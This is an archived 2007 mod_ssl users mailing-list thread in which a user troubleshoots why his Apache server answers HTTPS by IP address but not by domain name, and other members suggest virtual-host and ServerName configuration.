	by E59A-60.eole.dgi (Postfix) with ESMTP id 87B531362C3;
	Tue, 19 Jun 2007 09:47:14 +0200 (CEST)
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org, owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.12   February 13, 2003
From: abel.nivault@dgi.finances.gouv.fr
Message-ID: 
Date: Tue, 19 Jun 2007 09:47:28 +0200
X-MIMETrack: Serialize by Router on E59A-50/M/SERV/DGI/FINANCES/GOUV/FR(Release 6.5.4FP1
 | June 19, 2005) at 19/06/2007 09.47.28,
	Serialize complete at 19/06/2007 09.47.28
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abel.nivault@dgi.finances.gouv.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON
abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web
forwarding", where the holders of our domain name forward requests onto
the ip address of our web server. This works for http, could it be
possible that something needs configuring at the company that holds our
domain name (easily.co.uk) to forward on https requests, or is that a
real long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help=20
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this=20
> domain in your current Apache configuration.
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 10:07:50 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CB58714D85B; Tue, 19 Jun 2007 10:07:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id CAA0F14D82E
	for ; Tue, 19 Jun 2007 10:07:49 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly08e.srv.mailcontrol.com (MailControl) with ESMTP id l5J86ltq020445
	for ; Tue, 19 Jun 2007 09:06:48 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Ref : RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Tue, 19 Jun 2007 09:08:11 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC31472F@clotho.retainagroup.com>
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Ref : RE: SSL by Domain Name Error
thread-index: AceyRm1Qnp8RKXa7S/ea97NtLEnKNAAAhV1Q
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.118
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I read this on other posts, so does that mean I'll never be able to configu=
re my apache set up to be accessed like this :-

https:\\www.mydomain.com


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 08:47
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org; owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error


Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the virtua=
l host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web forwarding"=
, where the holders of our domain name forward requests onto the ip address=
 of our web server. This works for http, could it be possible that somethin=
g needs configuring at the company that holds our domain name (easily.co.uk=
) to forward on https requests, or is that a real long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this
> domain in your current Apache configuration.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam. ____=
__________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 10:53:32 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C9F4E14D85B; Tue, 19 Jun 2007 10:53:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.dgi.minefi.gouv.fr (mta4-milter-pas2.dgi.minefi.gouv.fr [145.242.2.165])
	by master.modssl.org (Postfix) with ESMTP id 2436514D82E
	for ; Tue, 19 Jun 2007 10:53:31 +0200 (CEST)
Received: from mail.dgi.minefi.gouv.fr (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with SMTP id DD209C900C0
	for ; Tue, 19 Jun 2007 10:52:33 +0200 (CEST)
Received: from E59C-60.eole.dgi (e59c-60.eole.dgi [10.153.69.60])
	by mail.dgi.minefi.gouv.fr (Postfix) with ESMTP id A3AF1C900BF
	for ; Tue, 19 Jun 2007 10:52:33 +0200 (CEST)
Received: from e59a-50.eole.dgi (unknown [10.153.67.50])
	by E59C-60.eole.dgi (Postfix) with ESMTP id 59AC327C43
	for ; Tue, 19 Jun 2007 10:50:31 +0200 (CEST)
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: SSL by Domain Name Error
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.12   February 13, 2003
From: abel.nivault@dgi.finances.gouv.fr
Message-ID: 
Date: Tue, 19 Jun 2007 10:52:31 +0200
X-MIMETrack: Serialize by Router on E59A-50/M/SERV/DGI/FINANCES/GOUV/FR(Release 6.5.4FP1
 | June 19, 2005) at 19/06/2007 10.52.33,
	Serialize complete at 19/06/2007 10.52.33
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abel.nivault@dgi.finances.gouv.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

No, you speak here about the url to access your web server.=20
What I ment is : when you configure your virtual host in httpd.conf, if=20
you want it to run in https mod, you have to set up the virtual host=20
directive with an IP an not with a host name:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will work


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will not

Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON
abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 10:08
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: SSL by Domain Name Error


I read this on other posts, so does that mean I'll never be able to=20
configure my apache set up to be accessed like this :-

https:\\www.mydomain.com


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =

On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 08:47
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org; owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error


Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the=20
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web=20
forwarding", where the holders of our domain name forward requests onto=20
the ip address of our web server. This works for http, could it be=20
possible that something needs configuring at the company that holds our=20
domain name (easily.co.uk) to forward on https requests, or is that a real =

long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =

On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this
> domain in your current Apache configuration.
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.=20
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 11:05:38 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5166814D85B; Tue, 19 Jun 2007 11:05:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 2BBEF14D82E
	for ; Tue, 19 Jun 2007 11:05:36 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly35e.srv.mailcontrol.com (MailControl) with ESMTP id l5J94NPw021359
	for ; Tue, 19 Jun 2007 10:04:24 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Ref : RE: Ref : RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Tue, 19 Jun 2007 10:05:46 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314731@clotho.retainagroup.com>
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Ref : RE: Ref : RE: SSL by Domain Name Error
thread-index: AceyT6bKptVTmYCsRBqqnOx4vFECAgAAFwHw
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.145
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


This is exactly how I've got it set up and unfortunately I can't use SSL th=
rough my domain name (https://www.mydomain.com) but can access it via my ip=
 address (https://1.2.3.4).


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 09:53
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: SSL by Domain Name Error


No, you speak here about the url to access your web server.=20
What I ment is : when you configure your virtual host in httpd.conf, if=20
you want it to run in https mod, you have to set up the virtual host=20
directive with an IP an not with a host name:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will work


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will not

Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 10:08
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: SSL by Domain Name Error


I read this on other posts, so does that mean I'll never be able to=20
configure my apache set up to be accessed like this :-

https:\\www.mydomain.com


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]=
=20
On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 08:47
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org; owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error


Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the=20
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web=20
forwarding", where the holders of our domain name forward requests onto=20
the ip address of our web server. This works for http, could it be=20
possible that something needs configuring at the company that holds our=20
domain name (easily.co.uk) to forward on https requests, or is that a real=
=20
long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]=
=20
On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help=20
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this=20
> domain in your current Apache configuration.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 11:09:13 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 91DB014D85B; Tue, 19 Jun 2007 11:09:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.dgi.minefi.gouv.fr (mta2-milter-pas2.dgi.minefi.gouv.fr [145.242.2.163])
	by master.modssl.org (Postfix) with ESMTP id 38D7A14D82E
	for ; Tue, 19 Jun 2007 11:09:11 +0200 (CEST)
Received: from mail.dgi.minefi.gouv.fr (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with SMTP id 7D52D6A8009
	for ; Tue, 19 Jun 2007 11:08:16 +0200 (CEST)
Received: from E59A-60.eole.dgi (e59a-60.eole.dgi [10.153.67.60])
	by mail.dgi.minefi.gouv.fr (Postfix) with ESMTP id 485F26A8001
	for ; Tue, 19 Jun 2007 11:08:16 +0200 (CEST)
Received: from e59a-50.eole.dgi (unknown [10.153.67.50])
	by E59A-60.eole.dgi (Postfix) with ESMTP id EC9A81362C3
	for ; Tue, 19 Jun 2007 11:08:00 +0200 (CEST)
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.12   February 13, 2003
From: abel.nivault@dgi.finances.gouv.fr
Message-ID: 
Date: Tue, 19 Jun 2007 11:08:14 +0200
X-MIMETrack: Serialize by Router on E59A-50/M/SERV/DGI/FINANCES/GOUV/FR(Release 6.5.4FP1
 | June 19, 2005) at 19/06/2007 11.08.15,
	Serialize complete at 19/06/2007 11.08.15
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abel.nivault@dgi.finances.gouv.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

What is the message in apache error log file ?


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON
abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 11:05
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: Ref : RE: SSL by Domain Name Error



ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


This is exactly how I've got it set up and unfortunately I can't use SSL=20
through my domain name (https://www.mydomain.com) but can access it via my =
ip address (https://1.2.3.4).


